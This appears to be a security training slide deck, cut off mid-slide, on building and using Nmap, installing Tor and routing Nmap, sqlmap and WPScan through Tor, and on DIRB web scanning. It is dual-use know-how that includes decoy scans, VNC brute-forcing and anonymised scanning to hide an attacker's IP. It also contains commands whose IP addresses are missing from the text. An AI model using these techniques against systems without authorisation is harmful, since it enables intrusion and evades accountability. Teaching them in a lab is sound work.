NMAP Nmap What is Nmap? Network MAPper - open-source tool for network scanning Nmap is very popular, powerful, free and well documented utility Good for IT auditing, asset discovery, security profiling and penetration testing www.cybexer.com 2 Nmap What does NMAP do? Sends raw IP packets to determine available hosts and services Helps to identify security holes www.cybexer.com 3 Nmap Brief history of Nmap ✓ September 1997 - 1st release of Nmap ✓ December 1998 - Nmap version 2.00 is publicly released ✓ July 2007 - Zenmap graphical front-end released ✓ October 2020 - Nmap version 7.90 released www.cybexer.com 4 Nmap Full Nmap package contains several additional tools Zenmap - advanced GUI (Linux, Windows, Mac OS) Ncat - data transfer, redirection, and debugging tool Ndiff - scan results comparing utility Nping - packet generation and response analysis tool www.cybexer.com 5 Nmap Build your own Nmap • download • compile • verify • run www.cybexer.com 6 Nmap Download latest release from nmap.org with 'wget' • cd /opt • wget https://nmap.org/dist/nmap-7.92.tar.bz2 www.cybexer.com 7 Nmap To save downloaded file with different filename use '-O' option • wget https://nmap.org/dist/nmap-7.92.tar.bz2 -O /opt/nmap-custom.tar.bz2 www.cybexer.com 8 Nmap In case if 'wget' is missing on your system, use 'curl' command to get Nmap source code • cd /opt • curl https://nmap.org/dist/nmap-7.92.tar.bz2 -o nmap-7.92.tar.bz2 www.cybexer.com 9 Nmap Extract downloaded Nmap archive • tar -jvxf nmap-7.92.tar.bz2 Keep in mind, that archive will be extracted to current folder www.cybexer.com 10 Nmap Extract archive to different folder • tar -jvxf nmap-7.92.tar.bz2 -C /tmp/ To make extraction silent, remove 'v' option www.cybexer.com 11 Nmap Configure Nmap • cd nmap-7.92/ • ./configure --help www.cybexer.com 12 Nmap Configure Nmap • ./configure --prefix=/opt/nmap If '--prefix=<path>' is not defined, then default installation will be done to '/usr/local' folder www.cybexer.com 13 Nmap Configure Nmap Verify output of './configure' command If some required options needed, but Nmap is not compiling with their support, then additional libraries must be installed (apt-get install libssl1.0-dev) www.cybexer.com 14 Nmap Clean up from previous './configure' command • make clean www.cybexer.com 15 Nmap After missing libraries are installed, re-run './configure' command • ./configure --prefix=/opt/nmap www.cybexer.com 16 Nmap Build Nmap • make www.cybexer.com 17 Nmap Verify, that after 'make' command no errors are displayed (some warnings may occur) www.cybexer.com 18 Nmap If 'make' finishes without errors, proceed with installation of Nmap • make install Root privileges are required during "make install" phase. www.cybexer.com 19 Nmap Check output of 'make install' command If all went well, you should see the following text "NMAP SUCCEFFULLY INSTALLED" www.cybexer.com 20 Nmap Verify newly installed Nmap • /opt/nmap/bin/nmap -V www.cybexer.com 21 Nmap Since Nmap installed in new/custom location, $PATH environment should be adjusted • echo $PATH www.cybexer.com 22 Nmap Since Nmap installed in new/custom location, $PATH environment should be adjusted • export PATH=/opt/nmap/bin:$PATH • echo $PATH www.cybexer.com 23 Nmap Let's start scanning www.cybexer.com 24 Nmap Running Nmap without any arguments will show basic usage options • nmap www.cybexer.com 25 Nmap Basic scanning with Nmap Everything on the Nmap command-line that isn't an option (or option argument) is treated as a target host specification Scan single IP address • nmap www.cybexer.com 26 Nmap Basic scanning Scan multiple targets • nmap Note! Change 2nd and 3rd octets to correct ones! www.cybexer.com 27 Nmap Basic scanning Scan targets with CIDR-style addressing • nmap 10.XX.32.5/24 "/24" CIDR notation will scan 256 hosts starting from 10.XX.32.0 and ending with 10.XX.32.255 www.cybexer.com 28 Nmap Basic scanning Scan range of targets • nmap 10.XX.32.100-105 www.cybexer.com 29 Nmap Basic scanning Ranges can be specified for any network octets • nmap 192.168.113-114,205.100-102,177 This target range will scan following hosts,,,,,,,,,, and www.cybexer.com 30 Nmap Basic scanning List Scan (-sL) - only shows list of targets without performing any scans. Ideal to generate host lists • nmap -sL 192.168.113-114,205.100-102,177 www.cybexer.com 31 Nmap Basic Scanning Scan targets specified in the file. Target entries may be any of the formats accepted by Nmap on command line (IP address, hostname, CIDR, IPv6 etc) Each entry must be separated by one or more spaces, tabs, or newlines www.cybexer.com 32 Nmap Basic Scanning Sample content of the target list file www.cybexer.com 33 Nmap Basic Scanning Scan target list from the file • nmap -iL hosts.txt www.cybexer.com 34 Nmap Basic Scanning Excluding targets from the scan • nmap --exclude Multiple exclude targets are allowed (must be commaseparated) --exclude,editor.cnn.com, www.cybexer.com 35 Nmap Basic Scanning Excluding targets using a list file • nmap --excludefile excluded.txt 'excluded.txt' must contain IP address/es, hostname/s or CIDR's of excluded targets Each entry must be separated by one or more spaces, tabs, or newlines www.cybexer.com 36 Nmap Basic Scanning Scan IPv6 targets • nmap -6 fd03:c01:XX:32::2 To scan IPv6 address, both, source and target hosts must be configured for IPv6 www.cybexer.com 37 Nmap Basic Scanning Scanning of IPv6 targets supports same options as IPv4 targets: --exclude --excludefile www.cybexer.com 38 Nmap Basic Scanning Do not run DNS lookups for scanned targets • nmap -n srv.studentXX.csirt.crp Since DNS resolving can be slow, using '-n' may speedup scanning time www.cybexer.com 39 Nmap Basic Scanning Use custom DNS servers for DNS resolution • nmap --dns-servers files.csirt.crp Note! Check your DNS server IP from /etc/resolv.conf www.cybexer.com 40 Nmap Basic Scanning By default, Nmap scans only first IP address of resolved hostname. For example, running "nmap cnn.com" will scan only first resolved IP address - To can all IP addresses, use '-R' option • nmap -R cnn.com www.cybexer.com 41 Nmap Basic Scanning By default (without any port options), Nmap scans 1000 default ports for each protocol. To scan specific port, use '-p <port_number>' • nmap -p 80 files.csirt.crp www.cybexer.com 42 Nmap Basic Scanning Different ports can be comma-separated • nmap -p 80,443,8080 files.csirt.crp Or port ranges can be separated with hyphen • nmap -p 70-100,200-250,1000-1024 files.csirt.crp www.cybexer.com 43 Nmap Basic Scanning Excluding port numbers from scanning • nmap --exclude-ports 22 files.csirt.crp Multiple ports and port ranges can be also used • nmap --exclude-ports 22,70-80,443 files.csirt.crp www.cybexer.com 44 Nmap Basic Scanning To scan all port use '-p-' option • nmap -p- srv.studentXX.csirt.crp If you forget the maximum number of ports, then you can always calculate it using the formula: 216 - 1 www.cybexer.com 45 Nmap Basic Scanning Specifying particular protocol for particular port • nmap -sSU -p U:53,111,161,T:21-25,80,139,8080 srv.studentXX.csirt.crp This scanning option will scan UDP ports 53, 111,and 161. And TCP ports 21 to 25, 80, 139 and 8080. www.cybexer.com 46 Nmap Basic Scanning By default, Nmap scans ports in random order. If sequential port scanning is needed (e.g., IDS/IPS or firewall testing), then '-r' option must be specified • nmap -r -p 100-200 srv.studentXX.csirt.crp '-r' option sorts ports from lowest to highest www.cybexer.com 47 Nmap Basic Scanning Scan 'most popular' ports on the targets. Number '10' stands for number of top ports to be scanned • nmap --top-ports 10 srv.studentXX.csirt.crp Nmap uses its own database of port popularity (/usr/share/nmap/nmap-services). '--top-ports' option is very useful for initial scans and largescale scans. '--top-ports' option can be combined with '--exclude-ports' option www.cybexer.com 48 Nmap Basic Scanning Depends on the scan types and options, sometimes it's reasonable to run fast scan against the targets '-F' options scans 100 top ports • nmap -F srv.studentXX.csirt.crp www.cybexer.com 49 Nmap Basic Scanning During default scanning, Nmap will display open, filtered and closed ports If you want to display only 'open' ports, then option '-open' should be used • nmap -sS -Pn -n --open 10.XX.32.5 www.cybexer.com 50 Nmap Basic Scanning Definition of port states 'open' - an application on the target machine is listening for connections/packets on that port 'filtered' - a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed 'closed' - no application listening on them, though they could open up at any time www.cybexer.com 51 Nmap To detect OS (Operating System) of the target, Nmap uses TCP/IP stack fingerprinting. Nmap sends a series of TCP and UDP packets to the remote host and examines practically every bit in the responses. After performing dozens of tests such as TCP ISN sampling, TCP options support and ordering, IP ID sampling, and the initial window size check, Nmap compares the results to its nmap-os-db database of more than 2600 known OS fingerprints and prints out the OS details if there is a match. www.cybexer.com 52 Nmap Detecting OS (Operating System) • nmap -O srv.studentXX.csirt.crp www.cybexer.com 53 Nmap Aggressive scan • nmap -A srv.studentXX.csirt.crp www.cybexer.com 54 Nmap Aggressive scan gives much more information about scanned targets and running services, comparing to default scan, but it is also more time consuming. Aggressive scan tries to detect OS (-O), versions of detected services (-sV), script scanning (-sC) and traceroute information. Aggressive scan also is more intrusive than default scan, since Nmap runs more checks of the target. www.cybexer.com 55 Nmap By default, without any scanning options, Nmap runs TCP SYN scan. Parameter '-sS' stands for SYN scan • nmap -sS Note! Syn scan requires 'root' privileges. www.cybexer.com 56 Nmap TCP SYN scan is most preferred scanning technique. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by restrictive firewalls. It is also relatively unobtrusive and stealthy since it never completes TCP connections. www.cybexer.com 57 Nmap To perform TCP Connect scan use '-sT' option • nmap -sT Note! TCP Connect scan can be run as unprivileged user www.cybexer.com 58 Nmap By default, Nmap scans for TCP services. To check UDP services running on targets hosts use '-sU' option • nmap -sU www.cybexer.com 59 Nmap Since UDP and TCP are completely different protocols, be careful when scanning large UDP port ranges. It's highly preferable to run UDP scans against specific, most used ports or limit number of UDP ports with '-top-ports 10' option • nmap -sU --top-ports 10 10.XX.32.5 www.cybexer.com 60 Nmap Nmap allows to combine scanning of TCP and UDP ports. Options '-sT' and '-sU' must be used. You can add any other options described above. • nmap -sT -sU www.cybexer.com 61 Nmap For different purposes Nmap allows to set fine-grained timing controls. Timing options are defined with '-T' flag followed by numbers from 0 to 5 -T0 - paranoid mode, 1 probe sent every 5 minutes -T1 - sneaky mode, 15 seconds between each probe -T2 - polite mode, 0.4 seconds between each probe www.cybexer.com 62 Nmap For different purposes Nmap allows to set fine-grained timing controls. Timing options are defined with '-T' flag followed by numbers from 0 to 5 -T3 - normal mode, this is default scanning setting. It runs in parallel mode -T4 - aggressive mode, runs with smaller timeouts and retries -T5 - insane mode, runs even with smaller timeouts and retries than '-T4' mode www.cybexer.com 63 Nmap Nmap allows to combine scanning of TCP and UDP ports. Options '-sT' and '-sU' must be used. You can add any other options described above. • nmap -sS -T1 -p 22 www.cybexer.com 64 Nmap Compare -T1 and -T2 scanning times • nmap -sS -T2 -p 22 www.cybexer.com 65 Nmap It is important to save Nmap port scanning results. There're many good reasons to do that - stay stealthy (avoid scanning many times) - compare different Nmap scan results - share with other team members - import scan results into other tools and applications www.cybexer.com 66 Nmap Nmap scan results have 5 different formats - interactive output (default stdout/screen output) - normal output, saves interactive output to the file - XML output, saves Nmap scan results to the file in XML format - grepable output, saves Nmap scan results to the file, which can be searched and parsed with standard Linux tools such as grep, awk, sed etc. - script kiddie output, saves Nmap scan results to the file written in 'hackers' language www.cybexer.com 67 Nmap Save Nmap scan results to the file • nmap -oN output.txt 10.XX.32.5 After scan, 'output.txt' file with scan results will be created in current folder www.cybexer.com 68 Nmap Save Nmap scan results to the file • nmap -oG outputg.txt 10.XX.32.5 After scan, 'outputg.txt' file with scan results will be created in current folder www.cybexer.com 69 Nmap Save Nmap scan results to the file • nmap -oX output.xml 10.XX.32.5 After scan, 'output.xml' file with scan results will be created in current folder. File format is XML www.cybexer.com 70 Nmap Save Nmap scan results to the file • nmap -oS outputs.txt 10.XX.32.5 After scan, 'outputs.txt' file with scan results will be created in current folder www.cybexer.com 71 Nmap Sometimes there's a need to save Nmap scan results in different formats. Instead of specifying different '-o' options, it is possible to save output in all formats (except script kiddies format) • nmap -oA scan01 10.XX.32.5 www.cybexer.com 72 Nmap Option '-oA scan01' means, that after Nmap finishes scanning, 3 different output files with scanning results will be created and prefix for the files will be 'scan01'. .gnmap extension is for 'grepable' file format .nmap extension is for default file format .xml extension is for XML file format • ls -la scan01.* www.cybexer.com 73 Nmap XML output is one of the most important output types, as it can be converted to HTML, easily parsed by programs such as Nmap graphical user interfaces or imported into databases or applications. www.cybexer.com 74 Nmap Let's convert Nmap XML output file to HTML file We use xsltproc command, which is command line XSLT processor • xsltproc scan01.xml -o /var/www/html/scan01.html Start Apache web server on your Kali Linux • service apache2 start www.cybexer.com 75 Nmap Open created HTML page in web browser http://10.XX.32.2/scan01.html www.cybexer.com 76 Nmap By default, during scan Nmap is not showing any progress. During scan, by pressing 'space' or 'enter' keys you can see progress of the scan www.cybexer.com 77 Nmap To display periodically scanning statistics you can use '-stats-every' options followed by number, which defines interval of status update • nmap --stats-every 10s 10.XX.32.2/24 www.cybexer.com 78 Nmap If you need to identify hosts which are online, but without actual port scanning, then Nmap can be run in 'ping-sweep' mode • nmap -sn 10.XX.32.0/24 Older versions of Nmap has option '-sP' www.cybexer.com 79 Nmap Depends on the network setup, firewalls may be blocking ICMP requests. If it happens, then Nmap will not do port scan if target is not pingable. To disable 'ping scan', but run port scan on all targets use '-Pn' options • nmap -Pn This type of scan helps to avoid firewalls, which block ICMP probes Older versions of Nmap use '-P0' options, to disable ping requests www.cybexer.com 80 Nmap - NSE scripts Advanced Nmap usage with NSE scripts NSE - Nmap scripting engine NSE offers very powerful and flexible features. It allows users to write (and share) simple scripts using the Lua programming language. NSE scripts allow to automate a wide variety of networking tasks. www.cybexer.com 81 Nmap - NSE scripts To get HTTP title page information • nmap -n -sS --script http-title --open -p 443 edition.cnn.com www.cybexer.com 82 Nmap - NSE scripts Nmap scripts default location is in '/usr/share/nmap/scripts' folder. There're over 600 different scripts • ls -la /usr/share/nmap/scripts/ www.cybexer.com 83 Nmap - NSE scripts Let's review 'http-title' NSE script • less /usr/share/nmap/scripts/http-title.nse www.cybexer.com 84 Nmap - NSE scripts When Nmap runs 'http-title' script, it sends HTTP GET request to the target server. Target host and port must be defined. Response from the server is saved to 'resp' variable www.cybexer.com 85 Nmap - NSE scripts If HTTP server responds with HTTP redirect status codes 30X, then HTTP title will be set to "Did not follow redirect to ...." • nmap -n -sS --script http-title --open -p 80 edition.cnn.com www.cybexer.com 86 Nmap - NSE scripts If HTTP response does not have HTTP Body content, then script execution will end www.cybexer.com 87 Nmap - NSE scripts If HTTP response does have HTTP Body content, scripts will be searching for HTML tag '<title>'. Since '<title>' tag can be written in different cases (Title, TITLE, tITLE etc.), then Regular Expression is used If HTTP body matches regular expression, then everything between '<title>' and '</title>' tags is saved to variable 'title' www.cybexer.com 88 Nmap - NSE scripts If HTML title variable length is over 65 characters, then rest of 'Title' value is removed and '...' appended www.cybexer.com 89 Nmap - NSE scripts Once 'http-title' script finishes its execution, HTTP 'title' will be returned to Nmap's output (shown in Nmap scan results) www.cybexer.com 90 Nmap - NSE scripts HTTP protocol is one of the most popular protocols in use today. Nmap has large number of NSE scripts, which allows to do complex scanning of web servers. www.cybexer.com 91 Nmap - NSE scripts Scanning for supported HTTP methods • nmap -p80 --script http-methods 10.XX.32.5 www.cybexer.com 92 Nmap - NSE scripts Discover interesting files and folders in web server • nmap -p80 --script http-enum 10.XX.32.5 www.cybexer.com 93 Nmap - NSE scripts Let's try some other NSE scripts 'whois-domain' script will query WHOIS server and display information about scanned domain • nmap --script whois-domain cnn.com www.cybexer.com 94 Nmap - NSE scripts Let's try some other NSE scripts 'smb-enum-shares' script will attempt to list remote shares on target server. For many NSE scripts it is advised to narrow down scan to specific ports. In case of remote shares, we will use port 445 • nmap -sS -Pn -n -p 445 --script smb-enum-shares 10.XX.32.5 www.cybexer.com 95 Nmap - NSE scripts Result of remote share scan www.cybexer.com 96 Nmap - NSE scripts Let's try some other NSE scripts Nmap allows to combine several NSE scripts • nmap --script ssl-cert,ssl-enum-ciphers -p 443 edition.cnn.com www.cybexer.com 97 Nmap - NSE scripts In this example 'ssl-cert' NSE script will show information about SSL/TLS certificate of the target - CN, Issuer, certificate validity period, SAN records and other certificate information 'ssl-enum-ciphers' will try to enumerate different SSL/TLS ciphers and output the information www.cybexer.com 98 Nmap - NSE scripts Let's try some other NSE scripts Some NSE scripts allow to brute-force services for different usernames and/or passwords • nmap --script vnc-brute -p 5901 10.XX.32.2 To see fill list of brute-force scripts, run following command in terminal • ls -al /usr/share/nmap/scripts/*brute* www.cybexer.com 99 Nmap - NSE scripts Nmap allows to combine NSE scripts with same prefix. For example, there're many scripts with 'http-' prefix: http-google-malware http-php-version http-sql-injection http-wordpress-users www.cybexer.com 100 Nmap - NSE scripts To run all HTTP scripts against the target, use 'http-*' for script option • nmap -p80 --script "http-*" 10.XX.32.5 Note! Be careful when using many scripts, it will generate 'A LOT' of traffic, will run much longer and in some cases, it can do denial of service for the target www.cybexer.com 101 Nmap - NSE scripts NSE scripts has different categories. Some scripts considered as intrusive, where some scripts are pretty safe to run against the target systems Run all nonintrusive scripts • nmap --script "not intrusive" 10.XX.32.5 Run safe scripts • nmap --script "safe" 10.XX.32.5 You can make very granular combination of NSE scripts • nmap --script "(default or safe or intrusive) and not http-*" 10.XX.32.5 www.cybexer.com 102 Nmap - NSE scripts Nmap allows to run decoy scan against the targets. Nmap makes it appear to the remote host that the host(s) you specify as decoys are scanning the target network too. It is generally very effective technique for hiding your IP address. • nmap -sS -Pn -n D192.168.1.1,, 10.XX.32.5 www.cybexer.com 103 Nmap - NSE scripts Sometimes you have to compare different scan results, to see what services and/or hosts appeared or removed between scans ndiff - utility to compare the results of Nmap scans Install 'ndiff' tool on Kali linus • apt-get install ndiff www.cybexer.com 104 Nmap - NSE scripts Ndiff application takes two Nmap XML output files and prints the differences between them. The differences observed are · Host states (e.g. up to down) · Port states (e.g. open to closed) · Service versions (from -sV) · OS matches (from -O) · Script output www.cybexer.com 105 Nmap - NSE scripts Let's compare two Nmap scan results • ndiff scan1.xml scan2.xml To see more detailed comparison, use '-v' options • ndiff -v scan1.xml scan2.xml www.cybexer.com 106 Tor Browser Tor Browser - installation Tor Browser – is a web-browser using the Tor network. It has some extra features to enhance your anonymity and privacy. The Tor network itself is designed to hide your original IP address. It is also encrypting Internet traffic sending from and to your computer. www.cybexer.com 108 Tor Browser - installation All in all, Tor Browser: • hides your IP • does not save any account information (logins and passwords) • does not save your web history • has some extra tools to protect you from reveal www.cybexer.com 109 Tor Browser - installation Tor Browser is now present in Kali Linux repository, but we will go through installation procedure step-by-step. As with most of the software for Linux, there're several ways how to download and/or install it. First way is to visit TOR's official site 'https://www.torproject.org' and download needed version. www.cybexer.com 110 Tor Browser - installation Here's the command, that will download latest version of Tor Browser archive, extract all files from that archive, then move extracted content to '/root/tor/' folder and finally remove downloaded Tor Browser archive • temp="$(curl -s https://www.torproject.org/download/languages/)" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_ALL.tar.xz' | tail -n 1` && wget -O tor-browserlinux64.tar.xz "https://www.torproject.org$temp2" && tar xvfJ tor-browser-linux64.tar.xz && rm -f torbrowser-linux64.tar.xz && mv tor-browser*/Browser/ ~/tor && rm -rf tor-browser* www.cybexer.com 111 Tor Browser - installation Let's take the whole command to pieces and see how it works and what it does. As you have noticed, there several places with '&&' • temp="$(curl -s https://www.torproject.org/download/languages/)" && temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_en-US.tar.xz' | tail -n 1` && wget -O tor-browserlinux64.tar.xz "https://www.torproject.org$temp2" && tar xvfJ tor-browser-linux64.tar.xz && rm -f torbrowser-linux64.tar.xz && mv tor-browser*/Browser/ ~/tor && rm -rf tor-browser* www.cybexer.com 112 Tor Browser - installation Double ampersand (&) in Linux OS separates different commands. The command after '&&' is executed only if previous command did not finish with errors. So, we have following 7 commands 1. temp="$(curl -s https://www.torproject.org/download/languages/)" 2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.-]+_enUS.tar.xz' | tail -n 1` 3. wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2" 4. tar xvfJ tor-browser-linux64.tar.xz 5. rm -f tor-browser-linux64.tar.xz 6. mv tor-browser*/Browser/ ~/tor 7. rm -rf tor-browser* www.cybexer.com 113 Tor Browser - installation Let's review all commands one by one. First command will fetch content from 'https://www.torproject.org/download/languages/' page using 'curl' program and store result in 'temp' variable 1. temp="$(curl -s https://www.torproject.org/download/languages/ )" www.cybexer.com 114 Tor Browser - installation Second command will print (echo) content of 'temp' variable from first command, then will search for alphanumeric text ending with '_en-US.tar.xz' and from that results only last line will be chosen and set to variable 'temp2' 2. temp2=`echo "${temp}" | grep -E -o '[A-Za-z0-9/_.]+_en-US.tar.xz' | tail -n 1` www.cybexer.com 115 Tor Browser - installation Before going further, lets run first and seconds commands and see what will be the result • temp="$(curl -s https://www.torproject.org/download/languages/) " && temp2=`echo "${temp}" | grep -E -o '[A-Za-z09/_.-]+_en-US.tar.xz' | tail -n 1` Since output of two commands is set to variable 'temp2', we will not see anything in output. To see value of 'temp2' variable, type following command • echo $temp2 www.cybexer.com 116 Tor Browser - installation From 1st and 2nd commands we have variable 'temp2'. This variable is used in 3rd command, which will download Tor Browser and save file as 'tor-browserlinux64.tar.xz' 3. wget -O tor-browser-linux64.tar.xz "https://www.torproject.org$temp2" www.cybexer.com 117 Tor Browser - installation After running first 3 commands, in our current folder we must have downloaded Tor Browser archive. Let's check the content of current folder • ls -la If you have file 'tor-browser-linux64.tar.xz' in current folder, then execution of first three commands was successful. www.cybexer.com 118 Tor Browser - installation 4th command will extract content of downloaded archive into current folder 4. tar xvfJ tor-browser-linux64.tar.xz Note. If you want to minimize screen output during extraction, then remove 'v' option from command. www.cybexer.com 119 Tor Browser - installation 5th command will remove downloaded Tor Browser archive from current folder. '-f' option will not prompt for file deletion 5. rm -f tor-browser-linux64.tar.xz www.cybexer.com 120 Tor Browser - installation 6th command will move all content Tor Browser folder to new location 'tor' in user's home folder 6. mv tor-browser*/Browser/ ~/tor www.cybexer.com 121 Tor Browser - installation The final, 7th command will clean-up 'leftovers' from Tor Browser archive extraction 7. rm -rf tor-browser* www.cybexer.com 122 Tor Browser - usage Before using the Tor Browser, it is reasonable to verify installation location and permissions of files and folder • ls -la ~/tor/ www.cybexer.com 123 Tor Browser - usage Latest Tor Browser will not run in 'root' user permissions. We have to do small adjustments to Tor launcher file "~/tor/start-tor-browser". Comment out following code: Result of changes www.cybexer.com 124 Tor Browser - usage Since the Tor Browser is a graphical program, it must be executed from graphical environment. Open in VNC viewer 10.XX.32.2:5901 Open Kali Linux terminal and execute following program • ~/tor/start-tor-browser www.cybexer.com 125 Tor Browser - usage If you see following screen, then click on 'Connect' button to start using the Tor Browser www.cybexer.com 126 Tor Browser - usage If you run the Tor Browser for the first time, then required configuration will be loaded www.cybexer.com 127 Tor Browser - usage To verify, that Tor Browser is working properly, open 'ipleak.net' site. If you see not your external IP address, then Tor Browser is working properly. www.cybexer.com 128 Tor Browser - usage Congratulations! By using Kali Linux command line, you have downloaded latest version of the Tor Browser, extracted the archive, moved to custom location and cleaned up files and folder after download. You have successfully installed Tor Browser. www.cybexer.com 129 Anonymous scanning through Tor Anonymity is a very complex problem that not be solved in a single document. Before starting real action, you must double-check everything in the laboratory environment. In this course, we will learn you how hide your real IP address while scanning by Nmap, sqlmap or WPScan. We will use Tor to route Nmap, sqlmap or WPScan traffic. www.cybexer.com 130 Anonymous scanning through Tor Let's install 'Tor' in Kali Linux. In terminal window type in following command • apt-get -y install torsocks tor www.cybexer.com 131 Anonymous scanning through Tor Main 'Tor' configuration file located here '/etc/tor/torrc'. For proper anonymity we have to add new 3 configuration options: AutomapHostsOnResolve - mapping of unused virtual addresses DNSPort - port for DNS UDP requests TransPort - port for transparent proxy connections www.cybexer.com 132 Anonymous scanning through Tor Let's append new options to 'Tor' configuration file • echo 'AutomapHostsOnResolve 1' >> /etc/tor/torrc • echo 'DNSPort 53530' >> /etc/tor/torrc • echo 'TransPort 9040' >> /etc/tor/torrc www.cybexer.com 133 Anonymous scanning through Tor Verify configuration changes with 'tail' command. Since we appended new options at the end of file, we can print only 10 last lines • tail -n10 /etc/tor/torrc www.cybexer.com 134 Anonymous scanning through Tor Now we have to enable 'Tor' process auto-startup • systemctl enable tor And finally, let's start main 'Tor' process • systemctl start tor www.cybexer.com 135 Anonymous scanning through Tor After 'Tor' start-up, it is advised to verify, that 'Tor' is running. Check 'tor' network connections with 'netstat' command • netstat -tulpna |grep tor www.cybexer.com 136 Anonymous scanning through Tor Or you can check status of Tor with 'systemctl' command • systemctl status tor www.cybexer.com 137 Anonymous scanning through Tor Now when we have 'Tor' service running we can check if it works properly with 'ProxyChains-NG' program. 'ProxyChains-NG' is a software, which redirects connections through socks/http proxies. The usage is pretty straightforward - add 'proxychains4' before desired command, to redirect traffic through the 'Tor' network. www.cybexer.com 138 Anonymous scanning through Tor Let's check our external IP address • curl ipinfo.io www.cybexer.com 139 Anonymous scanning through Tor Let's install 'proxychains4' from Kali Linux repository • apt-get -y install proxychains4 www.cybexer.com 140 Anonymous scanning through Tor Now, let's check our external IP address through 'Tor' network • proxychains4 curl ipinfo.io www.cybexer.com 141 Anonymous scanning through Tor As you see, 'Proxychains4' generates a lot of exceeded information. Try the following construction to suppress the unnecessary output • proxychains4 curl ipinfo.io 2>/dev/null Or use '-q' options • proxychains4 -q curl ipinfo.io www.cybexer.com 142 Anonymous scanning through Tor By default, 'Tor' randomly selects entry node, intermediate node(s) and exit node. After each 'Tor' service restart new nodes selected. To limit 'Tor' exit nodes to specific country, add following line to configuration file • echo 'ExitNodes {se}, {nl}, {ch}, {fr}' >> /etc/tor/torrc And restart 'Tor' service • service tor restart www.cybexer.com 143 Anonymous scanning through Tor Now, check your external IP address again • proxychains4 curl ipinfo.io 2>/dev/null You can test more, by restarting 'Tor' service and running 'proxychain4' command again www.cybexer.com 144 Anonymous scanning through Tor There're might be situations, when you want completely disable some countries from 'Tor' chain. To do that, use 'ExcludeNodes' option followed by country codes, which will be excluded • echo 'ExcludeNodes {ru}, {by}, {cn}, {ua}' >> /etc/tor/torrc After all configuration changes, you must restart 'Tor' service www.cybexer.com 145 Anonymous scanning through Tor For scanning with 'Nmap' through 'Tor' network you have to be very cautious. If you run 'Syn-Scan' against the target, your real IP address will be leaked. Let's see what will happen when we run 'nmap' with 'sS' option. www.cybexer.com 146 Anonymous scanning through Tor Open new Kali Linux terminal and start network packet capture • tcpdump -n -i eth0 -s0 host and port 443 www.cybexer.com 147 Anonymous scanning through Tor On machine where we initiate port scanning, we run 'proxychains4' with 'nmap' and set 'syn-scan' option • proxychains4 nmap -sS -PN -sV --open -n -p 443 2>/dev/null www.cybexer.com 148 Anonymous scanning through Tor Now, let's check 'tcpdump' output. We can clearly see, that our attacking machine's IP address was revealed www.cybexer.com 149 Anonymous scanning through Tor Next, we run 'nmap' with 'connect-scan', by using '-sT' option • proxychains4 nmap -sT -PN -sV --open -n -p 443 2>/dev/null www.cybexer.com 150 Anonymous scanning through Tor Running 'nmap' with '-sT' option did not reveal attacking machine's external IP address. www.cybexer.com 151 Anonymous scanning through Tor If you run 'nmap' through 'proxychains4 against the hostname, not IP address of target, then you might see an error 'nmap: netutil.cc:1319: int collect_dnet_interfaces(const intf_entry*, void*): Assertion `rc == 0' failed.' • proxychains4 nmap -sT -PN -sV -v -A -T4 -p 80 cnn.com www.cybexer.com 152 Anonymous scanning through Tor To fix that problem, there are two options - scan IP address, but not hostname - or comment out 'proxy_dns' option in '/etc/proxychains4.conf' file • sed -i 's/^proxy_dns/#proxy_dns/g' /etc/proxychains4.conf www.cybexer.com 153 Anonymous scanning through Tor 'sqlmap' anonymous scanning through 'Tor' network. 'sqlmap' has the --proxy option, therefore you just need to append --proxy socks5:// to you command • sqlmap -u TARGET --proxy socks5:// www.cybexer.com 154 Anonymous scanning through Tor 'WPScan' anonymous scanning through Tor network. WPScan has the similar --proxy flag, so just append -proxy socks5:// to your normal command • wpscan -u TARGET -e p,vt,u --proxy socks5:// Note. If you have significant delays in scanning, it's recommended to use --request-timeout 500 --connecttimeout 120 options www.cybexer.com 155 DIRB, NIKTO, GOBUSTER DIRB - overview DIRB is a Web Content Scanner. It looks for existing (and/or hidden) web objects. It works by launching a dictionary-based attack against a web server and analyzing the response. It comes with a set of preconfigured attack wordlists for easy usage, but you can use your custom wordlists. www.cybexer.com 157 DIRB - usage 'dirb' is a command-line tool. If you run it from Linux terminal window without any options, it will display its help • dirb www.cybexer.com 158 DIRB - usage To scan the web server, provide its hostname or IP address. Be sure you use full URL format with HTTP or HTTPS scheme • dirb http://srv.studentXX.csirt.crp/ www.cybexer.com 159 DIRB - usage If target web server is located not on standard port 80 or 443, you can use http(s) scheme with port number http://10.XX.32.5:8080/ If you want to scan specific folder of web target, you can add folder name to URL http://10.XX.32.5:8080/project/ www.cybexer.com 160 DIRB - usage By default, 'dirb' uses its own medium size wordlist, which is located at '/usr/share/dirb/wordlists/common.txt'. This wordlist has over 4500 lines of different words. 'dirb' has several wordlists, '/usr/share/dirb/wordlists/big.txt' which is over 20000 lines and '/usr/share/dirb/wordlists/small.txt' with 900+ lines. www.cybexer.com 161 DIRB - usage To use several wordlists, append them (comma separated) after hostname or IP address • cd /usr/share/dirb/wordlists • dirb http://10.XX.32.5/ ./small.txt,./big.txt www.cybexer.com 162 DIRB - usage By default, if 'dirb' finds a folder on the target web server, it will apply same dictionary to that folder. And if new folders will be found, 'dirb' will scan them again. This default action is very noisy, but to limit search to single folder, user '-r' option. This will not do recursive crawling • dirb http://10.XX.32.5/ -r www.cybexer.com 163 DIRB - usage There are might be situations where you need to extract the files of a specific extension over the target server. '-X' parameter followed by extension name(s) will append it to wordlist • dirb -X .php,.pl,.txt www.cybexer.com 164 DIRB - usage If you need to scan target server with delay of each request, add option '-z' followed by number of milliseconds • dirb http://10.XX.32.5/ -z 1356 -r www.cybexer.com 165 DIRB - usage For the purpose of better readability, and future references, you can save the output of the 'dirb' scan to the file. To do this, use the parameter '-o' followed by file name where output will be saved. • dirb http://10.XX.32.5/ -r -o output.txt www.cybexer.com 166 DIRB - usage To ignore listing files or folders with unnecessary HTTP response code, use '-N' option followed by 3-digit response code number • dirb http://10.XX.32.5/ -r -N 403 www.cybexer.com 167 DIRB - usage If target site uses HTTP basic authentication, user '-u' option followed by column separated username and password • dirb http://10.XX.32.5/ -r -u user:pass www.cybexer.com 168 DIRB - usage Some web sites may serve different content based on browser's User-Agent string. To change default UserAgent string, use '-a' 